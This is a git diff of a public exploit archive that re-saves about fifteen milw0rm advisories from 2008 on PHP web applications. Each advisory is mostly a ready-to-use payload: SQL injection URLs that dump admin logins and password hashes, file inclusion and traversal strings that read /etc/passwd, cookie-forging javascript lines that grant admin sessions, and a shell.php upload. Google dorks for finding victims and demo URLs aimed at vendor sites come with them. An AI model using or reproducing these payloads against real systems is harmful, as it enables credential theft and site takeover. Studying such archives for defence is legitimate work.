@@ -1,44 +1,44 @@ ---==+================================================================================+==-- ---==+ Pilot Online Training Solution Remote SQL Injection Vulnerbility +==-- ---==+================================================================================+==-- - --=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -AUTHOR: S.W.A.T. - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- - -Site: http://www.elmspro.com/etraining/ - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -DORK (google): "Powered by PG Online Training Solution - learning management system" - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -DESCRIPTION: -You Can See Admin User & MD5 Password ..::.. Then Crack It & Login ;) :D - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -EXPLOITS: -www.site.com/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/* - -Online Demo: -http://www.elmspro.com/etraining/demo/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/* - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -NOTE/TIP: - -Admin Login Is At /admin/ - - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - - ---==+================================================================================+==-- ---==+ Pilot Online Training Solution Remote SQL Injection Vulnerbility +==-- ---==+================================================================================+==-- - -# milw0rm.com [2008-09-28] +--==+================================================================================+==-- +--==+ Pilot Online Training Solution Remote SQL Injection Vulnerbility +==-- +--==+================================================================================+==-- + 
+-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +AUTHOR: S.W.A.T. + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- + +Site: http://www.elmspro.com/etraining/ + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +DORK (google): "Powered by PG Online Training Solution - learning management system" + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +DESCRIPTION: +You Can See Admin User & MD5 Password ..::.. Then Crack It & Login ;) :D + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +EXPLOITS: +www.site.com/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/* + +Online Demo: +http://www.elmspro.com/etraining/demo/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/* + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +NOTE/TIP: + +Admin Login Is At /admin/ + + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + +--==+================================================================================+==-- +--==+ Pilot Online Training Solution Remote SQL Injection Vulnerbility +==-- +--==+================================================================================+==-- + +# milw0rm.com [2008-09-28] diff --git a/platforms/php/webapps/6617.txt b/platforms/php/webapps/6617.txt index b138c0fb7..56e19e871 100755 --- a/platforms/php/webapps/6617.txt +++ b/platforms/php/webapps/6617.txt 
@@ -1,23 +1,23 @@ -------------------------------------------------------------------------- - -- JIKI Team [ JIKO + KIl1er ] --- -------------------------------------------------------------------------- -# Author : jiko -# email : jalikom@hotmail.com -# Home : www.no-back.org -# Script : BbZL.PhP -# Bug : Local Directory Traversal -# Download : http://sylvain.pasquet1.free.fr/index.php?type=1&base=vjek&nom=Téléchargements -=========================JIkI Team=================== -# Exploit : - http://localhost/cc/bbzl092/index.php?type=3&lien_2=../ -#ex : -http://sylvain.pasquet1.free.fr/index.php?type=3&lien_2=config -http://barbeuzweb.free.fr/index.php?type=3&lien_2=config -=========================JIKI Team=================== - greetz : all my friend and H-T Team and Stack-Terrorist and Gold_M and all No-back members and tryag.Com - visit: www.no-back.org & www.tryag.com -------------------------------------------------------------------------- - -- JIKI Team [ JIKO + KIl1er ] -- -------------------------------------------------------------------------- - -# milw0rm.com [2008-09-28] +------------------------------------------------------------------------- + -- JIKI Team [ JIKO + KIl1er ] --- +------------------------------------------------------------------------- +# Author : jiko +# email : jalikom@hotmail.com +# Home : www.no-back.org +# Script : BbZL.PhP +# Bug : Local Directory Traversal +# Download : http://sylvain.pasquet1.free.fr/index.php?type=1&base=vjek&nom=Téléchargements +=========================JIkI Team=================== +# Exploit : + http://localhost/cc/bbzl092/index.php?type=3&lien_2=../ +#ex : +http://sylvain.pasquet1.free.fr/index.php?type=3&lien_2=config +http://barbeuzweb.free.fr/index.php?type=3&lien_2=config +=========================JIKI Team=================== + greetz : all my friend and H-T Team and Stack-Terrorist and Gold_M and all No-back members and tryag.Com + visit: www.no-back.org & www.tryag.com 
+------------------------------------------------------------------------- + -- JIKI Team [ JIKO + KIl1er ] -- +------------------------------------------------------------------------- + +# milw0rm.com [2008-09-28] diff --git a/platforms/php/webapps/6618.txt b/platforms/php/webapps/6618.txt index 01a5fcd32..cecb16a4d 100755 --- a/platforms/php/webapps/6618.txt +++ b/platforms/php/webapps/6618.txt @@ -1,15 +1,15 @@ -Joomla Imagebrowser File Inc. - - -Cr@zy_King / www.biyosecurity.com / sqL Lov3r'Z Crew Co. 2008 - - -Down : http://www.joomlatr.org/index.php/component/remository/?func=fileinfo&id=129 - - -FI : http://127.0.0.1/index.php?option=com_imagebrowser&folder=../../../../ - - -Grtz : aLL My Friend'z ... - -# milw0rm.com [2008-09-28] +Joomla Imagebrowser File Inc. + + +Cr@zy_King / www.biyosecurity.com / sqL Lov3r'Z Crew Co. 2008 + + +Down : http://www.joomlatr.org/index.php/component/remository/?func=fileinfo&id=129 + + +FI : http://127.0.0.1/index.php?option=com_imagebrowser&folder=../../../../ + + +Grtz : aLL My Friend'z ... + +# milw0rm.com [2008-09-28] diff --git a/platforms/php/webapps/6620.txt b/platforms/php/webapps/6620.txt index 8e74cc781..c1c76304c 100755 --- a/platforms/php/webapps/6620.txt +++ b/platforms/php/webapps/6620.txt 
@@ -1,35 +1,35 @@ -######################################################## -PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vulnerability -######################################################## - - - -++++++++++++++++++++++++++++ -Author : boom3rang -webpage : www.khg-crew.ws -greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er | Kosova Hackers Group. -++++++++++++++++++++++++++++ - - - - -[+] Dork: inurl:"freshlinks_panel/index.php?linkid" - -[+] Example: http://localhost/infusions/freshlinks_panel/index.php?linkid= [SQL] &frame - -username: -index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6,7,8/**/from/**/fusion_users--&frame - -password: -index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6,7,8/**/from/**/fusion_users--&frame - - -ps. Username and Password you can find in Title! - -############################################ - =United State of Albania= - -Porud 2 be Albanian- - -Proud 2 be Muslim- -############################################ - -# milw0rm.com [2008-09-28] +######################################################## +PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vulnerability +######################################################## + + + +++++++++++++++++++++++++++++ +Author : boom3rang +webpage : www.khg-crew.ws +greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er | Kosova Hackers Group. +++++++++++++++++++++++++++++ + + + + +[+] Dork: inurl:"freshlinks_panel/index.php?linkid" + +[+] Example: http://localhost/infusions/freshlinks_panel/index.php?linkid= [SQL] &frame + +username: +index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6,7,8/**/from/**/fusion_users--&frame + +password: +index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6,7,8/**/from/**/fusion_users--&frame + + +ps. Username and Password you can find in Title! 
+ +############################################ + =United State of Albania= + -Porud 2 be Albanian- + -Proud 2 be Muslim- +############################################ + +# milw0rm.com [2008-09-28] diff --git a/platforms/php/webapps/6621.txt b/platforms/php/webapps/6621.txt index 160a3d71b..6446d2d06 100755 --- a/platforms/php/webapps/6621.txt +++ b/platforms/php/webapps/6621.txt @@ -1,9 +1,9 @@ -############################################################################################### -[+] BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability -[+] Discovered By Stack -[+] Greetz : All my freind -################################################################################################ -Exploit: -javascript:document.cookie = "phorum_admin_session=1; path=/"; - -# milw0rm.com [2008-09-28] +############################################################################################### +[+] BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability +[+] Discovered By Stack +[+] Greetz : All my freind +################################################################################################ +Exploit: +javascript:document.cookie = "phorum_admin_session=1; path=/"; + +# milw0rm.com [2008-09-28] diff --git a/platforms/php/webapps/6623.txt b/platforms/php/webapps/6623.txt index 97df5a268..9c49a5e95 100755 --- a/platforms/php/webapps/6623.txt +++ b/platforms/php/webapps/6623.txt 
@@ -1,36 +1,36 @@ -######################################################### -# -# Events Calendar 1.1 - -Remote File Inclusion Vulnerability - - -#======================================================== -# Author: kevin mitnick( tunisianblackhat team ) = -# = -# Home : http://tunisianblackhat.com = -# = -# email: kevinmitnick[A]live.fr = -# = -#========================================================= -# -# script : Events Calendar 1.1# -http://webscripts.softpedia.com/script/Calendar-Systems/Events-Calendar-WebBiscuits-46424.html -# DorK : Events Calendar 1.1# -########################################################## - -[~] Exploit : - - -http://youwebsite/panel/common/theme/default/header_setup.php?path[docroot]=[EV!L] -http://youwebsite/panel/common/theme/default/header_setup.php?component=[EV!L] - -########################( Greetz )########################### -# marw駭_neo , mrabah12R ,KaMiKaZe ,NaRuTo ,hijacker # -# Boomrang_Victim and all tunisian hackers # -# # -# # -# # -########################################################### - -# milw0rm.com [2008-09-29] +######################################################### +# +# Events Calendar 1.1 + +Remote File Inclusion Vulnerability + + +#======================================================== +# Author: kevin mitnick( tunisianblackhat team ) = +# = +# Home : http://tunisianblackhat.com = +# = +# email: kevinmitnick[A]live.fr = +# = +#========================================================= +# +# script : Events Calendar 1.1# +http://webscripts.softpedia.com/script/Calendar-Systems/Events-Calendar-WebBiscuits-46424.html +# DorK : Events Calendar 1.1# +########################################################## + +[~] Exploit : + + +http://youwebsite/panel/common/theme/default/header_setup.php?path[docroot]=[EV!L] +http://youwebsite/panel/common/theme/default/header_setup.php?component=[EV!L] + +########################( Greetz )########################### +# marw駭_neo , mrabah12R ,KaMiKaZe ,NaRuTo 
,hijacker # +# Boomrang_Victim and all tunisian hackers # +# # +# # +# # +########################################################### + +# milw0rm.com [2008-09-29] diff --git a/platforms/php/webapps/6624.txt b/platforms/php/webapps/6624.txt index 2535a9374..4ac7ca3bb 100755 --- a/platforms/php/webapps/6624.txt +++ b/platforms/php/webapps/6624.txt 
@@ -1,62 +1,62 @@ -|___________________________________________________| -| -| Arcadem Pro (articlecat) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -| -|___________________________________________________ -| | -| -| script : https://secure.agaresmedia.com/index.php?page=arcadempro.php -| -| DorK : Copyright © 2007 Agares Media. Powered by AMCMS3. -|___________________________________________________| - - -Exploit: -________ - - - -www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users-- - - -USer version - - -www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10-- - - - - - -Admin LogIn : - -www.[target].com/admin/ - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-29] +|___________________________________________________| +| +| Arcadem Pro (articlecat) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +| +|___________________________________________________ +| | +| +| script : https://secure.agaresmedia.com/index.php?page=arcadempro.php +| +| DorK : Copyright © 2007 Agares Media. Powered by AMCMS3. 
+|___________________________________________________| + + +Exploit: +________ + + + +www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users-- + + +USer version + + +www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10-- + + + + + +Admin LogIn : + +www.[target].com/admin/ + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-29] diff --git a/platforms/php/webapps/6625.txt b/platforms/php/webapps/6625.txt index 0641d1e30..1fa633f92 100755 --- a/platforms/php/webapps/6625.txt +++ b/platforms/php/webapps/6625.txt @@ -1,14 +1,14 @@ -Post Comments v3.0 Insecure Cookie Handling Vulnerability -**************************** -By Crackers_Child -**************************** -Demo : http://www.phpjabbers.com/post-comment/try/admin.php - -Vendor : by phpjabbers.com - -Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/"; -**************************** -Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun. -**************************** - -# milw0rm.com [2008-09-29] +Post Comments v3.0 Insecure Cookie Handling Vulnerability +**************************** +By Crackers_Child +**************************** +Demo : http://www.phpjabbers.com/post-comment/try/admin.php + +Vendor : by phpjabbers.com + +Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/"; +**************************** +Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun. +**************************** + +# milw0rm.com [2008-09-29] 
diff --git a/platforms/php/webapps/6626.txt b/platforms/php/webapps/6626.txt
index 35768a7c6..baf66127f 100755
--- a/platforms/php/webapps/6626.txt
+++ b/platforms/php/webapps/6626.txt
@@ -1,45 +1,45 @@ -================================================================================================================== - SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM - S N N N A A K K E S T E A A M M M M - SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M - S N N N A A K K E S T E A A M M M - SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M -===================================================SNAKES TEAM==================================================== -+ = -= PG Matchmaking Script Multiple Remote SQL Injection Vulnerability + -+ = -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Super Cristal :::ALGERIAN HaCkEr::: = = - = = - = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = - = = - = = :::::Mail: Super_Cristal@hotmail.com::::::: = = - = = - = = ::::script Demo: http://www.datingpro.com/matchmaking/demo::::= = - = = - ======================================Super Cristal=================================== -#product home: datingpro.com -#dork:find it - -Exploit(1): -******** -http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS-- -Exploit(2): -http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS-- - -demo:::: -http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS-- - - - - -=================================================================================================================== - -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members - -=================================================================================================================== - - ::::Super_Cristal@Hotmail.CoM:::: - -# milw0rm.com 
[2008-09-29] +================================================================================================================== + SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM + S N N N A A K K E S T E A A M M M M + SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + S N N N A A K K E S T E A A M M M + SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M +===================================================SNAKES TEAM==================================================== ++ = += PG Matchmaking Script Multiple Remote SQL Injection Vulnerability + ++ = +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Super Cristal :::ALGERIAN HaCkEr::: = = + = = + = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = + = = + = = :::::Mail: Super_Cristal@hotmail.com::::::: = = + = = + = = ::::script Demo: http://www.datingpro.com/matchmaking/demo::::= = + = = + ======================================Super Cristal=================================== +#product home: datingpro.com +#dork:find it + +Exploit(1): +******** +http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS-- +Exploit(2): +http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS-- + +demo:::: +http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS-- + + + + +=================================================================================================================== + +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members + +=================================================================================================================== + + ::::Super_Cristal@Hotmail.CoM:::: + +# milw0rm.com 
[2008-09-29] diff --git a/platforms/php/webapps/6628.txt b/platforms/php/webapps/6628.txt index 02e43c354..cd08e2d94 100755 --- a/platforms/php/webapps/6628.txt +++ b/platforms/php/webapps/6628.txt 
@@ -1,20 +1,20 @@ -#################################################################################### -###### Local File Inclusion Vulnerabilities ##### -###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip ##### -###### author : JIKO ##### -###### foor read a php file > ?rss=[name of file iwthout php] ##### -###### for execute exploit does not write extention of file ##### -###### ##### -###### ##### -###### exploit : /Script/rss.php?rss=../[name of file wthout php] ##### -###### ##### -###### example : /Script/rss.php?rss==/home/user/shell ##### -###### ##### -###### other files: rss=../../../../etc/passwd%00 ##### -###### WwW.No-exploit.Com cha7ta.eu ##### -###### H-T Team , v4 Team , Tryag , no-Back all my friend ##### -#################################################################################### -------== troops of Mohamed comming inchalah =----------------- -Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc - -# milw0rm.com [2008-09-29] +#################################################################################### +###### Local File Inclusion Vulnerabilities ##### +###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip ##### +###### author : JIKO ##### +###### foor read a php file > ?rss=[name of file iwthout php] ##### +###### for execute exploit does not write extention of file ##### +###### ##### +###### ##### +###### exploit : /Script/rss.php?rss=../[name of file wthout php] ##### +###### ##### +###### example : /Script/rss.php?rss==/home/user/shell ##### +###### ##### +###### other files: rss=../../../../etc/passwd%00 ##### +###### WwW.No-exploit.Com cha7ta.eu ##### +###### H-T Team , v4 Team , Tryag , no-Back all my friend ##### +#################################################################################### +------== troops of Mohamed comming inchalah =----------------- +Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc + +# milw0rm.com [2008-09-29] 
diff --git a/platforms/php/webapps/6629.txt b/platforms/php/webapps/6629.txt
index 53e938a47..10a4db08c 100755
--- a/platforms/php/webapps/6629.txt
+++ b/platforms/php/webapps/6629.txt
@@ -1,56 +1,56 @@ -|___________________________________________________| -| -| FAQ Management (catid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -| -|___________________________________________________ -| | -| -| script : http://www.quidascript.com/index.php?main_page=product_info&cPath=1_15&products_id=80 -| -| DorK : inurl:cfaq/index.php?catid= -| -| DorK : inurl:index.php?catid= -|___________________________________________________| - - - - - - -Exploit: - -www.[target].com/Script/index.php?catid=-1+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin-- - - -AdmiN LoGiN : - -www.[target].com/Script//admin.php - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|______________________________________________________________________ - - - Im IRAQi | Im TrYaG I - -# milw0rm.com [2008-09-30] +|___________________________________________________| +| +| FAQ Management (catid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +| +|___________________________________________________ +| | +| +| script : http://www.quidascript.com/index.php?main_page=product_info&cPath=1_15&products_id=80 +| +| DorK : inurl:cfaq/index.php?catid= +| +| DorK : inurl:index.php?catid= +|___________________________________________________| + + + + + + +Exploit: + 
+www.[target].com/Script/index.php?catid=-1+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin-- + + +AdmiN LoGiN : + +www.[target].com/Script//admin.php + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|______________________________________________________________________ + + + Im IRAQi | Im TrYaG I + +# milw0rm.com [2008-09-30] diff --git a/platforms/php/webapps/6632.txt b/platforms/php/webapps/6632.txt index 65df8725c..5bcadf752 100755 --- a/platforms/php/webapps/6632.txt +++ b/platforms/php/webapps/6632.txt 
@@ -1,36 +1,36 @@ -************************************************************************************** - -Author : By DaRkLiFe -Greetz : str0ke & S.VV.A.T. - -************************************************************************************** -Script : -Micronation Banking System(minba) 1.5.0 -Remote File Inclusion Vulnerability(s) - -Download: -http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0 - -************************************************************************************** - -Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz? - - -http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz? - -************************************************************************************** - -In Multiple files the vulnerability exists. - -I have posted two examples - -Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php"); -in minba/utility/utgn_message.php file - - -************************************************************************************** - -THANKS ! GREETZ ! -************************************************************************************** - -# milw0rm.com [2008-09-30] +************************************************************************************** + +Author : By DaRkLiFe +Greetz : str0ke & S.VV.A.T. + +************************************************************************************** +Script : +Micronation Banking System(minba) 1.5.0 +Remote File Inclusion Vulnerability(s) + +Download: +http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0 + +************************************************************************************** + +Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz? + + +http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz? 
+ +************************************************************************************** + +In Multiple files the vulnerability exists. + +I have posted two examples + +Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php"); +in minba/utility/utgn_message.php file + + +************************************************************************************** + +THANKS ! GREETZ ! +************************************************************************************** + +# milw0rm.com [2008-09-30] diff --git a/platforms/php/webapps/6633.txt b/platforms/php/webapps/6633.txt index a97ea0acc..6316dbe0a 100755 --- a/platforms/php/webapps/6633.txt +++ b/platforms/php/webapps/6633.txt 
@@ -1,51 +1,51 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -eFront <= 3.5.1 / build 2710: Remote File Inclusion Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -$ Program: eFront -$ File affected: studentpage.php / professorpage -$ Version: 3.5.1 / build 2710 -$ Download: http://www.efrontlearning.net - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - --- Description (by the author's page) -- -eFront is an easy to use, visually attractive, SCORM compatible, eLearning -and Human Capital Development system. It is suitable for both company and -educational usage. The core eFront system is offered as open-source software -so you can download and start using it immediately. Check the functionality -matrix for different eFront editions. - - --- Bug -- -If you are a student or a teacher you can upload an avatar. It not check the -extension (JPG, PNG, GIF, ...) and you can upload any file (ex: PHP) - -Website structure: - -site.com / - /upload/ -> Files saved - /admin/ - /avatars - /student/ - /avatars - /professor/ - /avatars - /www -> Website - /backups - /libraries - - --- Exploit -- -Students can upload a shell.php as the avatar ant next execute as: - http://site/upload/student/avatars/shell.php - -Teachers can upload a shell.php as the avatar ant next execute as: - http://site/upload/professor/avatars/shell.php - - -Note: in all sites I've tested upload dorectory is accesible by web - -# milw0rm.com [2008-09-30] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +eFront <= 3.5.1 / build 2710: Remote File Inclusion Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +$ Program: eFront +$ File affected: studentpage.php / professorpage +$ Version: 3.5.1 / build 2710 +$ Download: http://www.efrontlearning.net + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + +-- Description (by the author's page) -- +eFront is an easy to use, visually attractive, SCORM 
compatible, eLearning +and Human Capital Development system. It is suitable for both company and +educational usage. The core eFront system is offered as open-source software +so you can download and start using it immediately. Check the functionality +matrix for different eFront editions. + + +-- Bug -- +If you are a student or a teacher you can upload an avatar. It not check the +extension (JPG, PNG, GIF, ...) and you can upload any file (ex: PHP) + +Website structure: + +site.com / + /upload/ -> Files saved + /admin/ + /avatars + /student/ + /avatars + /professor/ + /avatars + /www -> Website + /backups + /libraries + + +-- Exploit -- +Students can upload a shell.php as the avatar ant next execute as: + http://site/upload/student/avatars/shell.php + +Teachers can upload a shell.php as the avatar ant next execute as: + http://site/upload/professor/avatars/shell.php + + +Note: in all sites I've tested upload dorectory is accesible by web + +# milw0rm.com [2008-09-30] diff --git a/platforms/php/webapps/6635.txt b/platforms/php/webapps/6635.txt index 0f5714e23..d0bd4e149 100755 --- a/platforms/php/webapps/6635.txt +++ b/platforms/php/webapps/6635.txt @@ -1,9 +1,9 @@ -############################################################################################### -[+] SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability -[+] Discovered By Stack -[+] Greetz : All my freind -################################################################################################ -Exploit: -javascript:document.cookie = "Auth=1; path=/;"; - -# milw0rm.com [2008-09-30] +############################################################################################### +[+] SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability +[+] Discovered By Stack +[+] Greetz : All my freind +################################################################################################ +Exploit: +javascript:document.cookie = "Auth=1; path=/;"; + +# milw0rm.com [2008-09-30] 
diff --git a/platforms/php/webapps/6636.txt b/platforms/php/webapps/6636.txt index d8328afcd..14cd14b1a 100755 --- a/platforms/php/webapps/6636.txt +++ b/platforms/php/webapps/6636.txt @@ -1,36 +1,36 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -/ Script: Rianxosencabos -/ Version: 0.9 -/ File affected: scripts/links.php -/ Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz - - -ka0x -D.O.M Labs - Security Researchers -- www.domlabs.org - -Vuln code: - ------ -88: function visita($id) { -93: $resultado=$bd->consulta("SELECT direccion, clicks FROM links WHERE id=$id LIMIT 1"); -.... - -112: if ($_GET['id']) { -113: links::visita($_GET['id']) ------ - - -Proof of Concept: - -http://[host]/[cms]/?s=links&id=1 and 1=1 -> True -http://[host]/[cms]/?s=links&id=1 and 1=0 -> False -http://[host]/[cms]/?s=links&id=1 and ascii(substring(@@version,1,1)=52 - - -__END__ - -# milw0rm.com [2008-09-30] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +/ Script: Rianxosencabos +/ Version: 0.9 +/ File affected: scripts/links.php +/ Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz + + +ka0x 